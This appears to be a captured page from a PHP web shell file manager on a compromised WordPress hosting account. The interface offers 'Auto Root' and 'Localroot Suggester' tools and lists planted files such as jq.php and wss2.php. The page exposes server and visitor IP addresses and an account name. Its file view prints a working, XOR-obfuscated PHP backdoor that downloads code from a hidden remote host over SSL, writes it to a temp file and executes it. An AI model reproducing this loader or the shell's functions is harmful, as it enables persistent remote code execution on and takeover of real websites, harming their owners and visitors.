Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 18.225.56.185
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
landrover-fondazione.online /
data /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2025-04-24 03:35
error_log
3.26
MB
-rw-r--r--
2025-04-24 03:35
jq.php
1.15
KB
-rw-r--r--
2025-02-03 22:56
wp-blog-header.php
2.73
KB
-r--r--r--
2025-04-22 01:18
wp-cron.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
wss2.php
1.01
KB
-rw-r--r--
2025-02-03 22:55
Save
Rename
<?=""; function xorEncryptDecrypt($data, $key) { $output = ''; foreach (str_split($data) as $char) { $output .= chr(ord($char) ^ ord($key)); } return $output; } $_ = "!"; $url = xorEncryptDecrypt("S@VFHUITCTRDSBNOUDOUBNL", $_); $path = xorEncryptDecrypt("xTB@DSHORHLQMDBLE@OEC@BJENNSSDGRID@ERL@HOVRQIQ", $_); $fp = fsockopen("ssl://$url", 443, $errno, $errstr, 10); if (!$fp) { echo "Error: $errstr ($errno)"; exit; } $request = "GET $path HTTP/1.1\r\n"; $request .= "Host: $url\r\n"; $request .= "Connection: close\r\n\r\n"; fwrite($fp, $request); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); list(, $remotePayload) = explode("\r\n\r\n", $response, 2); $parts = str_split($remotePayload, 4); $obfuscatedPayload = implode('', $parts); $tempFile = tempnam(sys_get_temp_dir(), 'php'); file_put_contents($tempFile, $obfuscatedPayload); include $tempFile; unlink($tempFile); ?>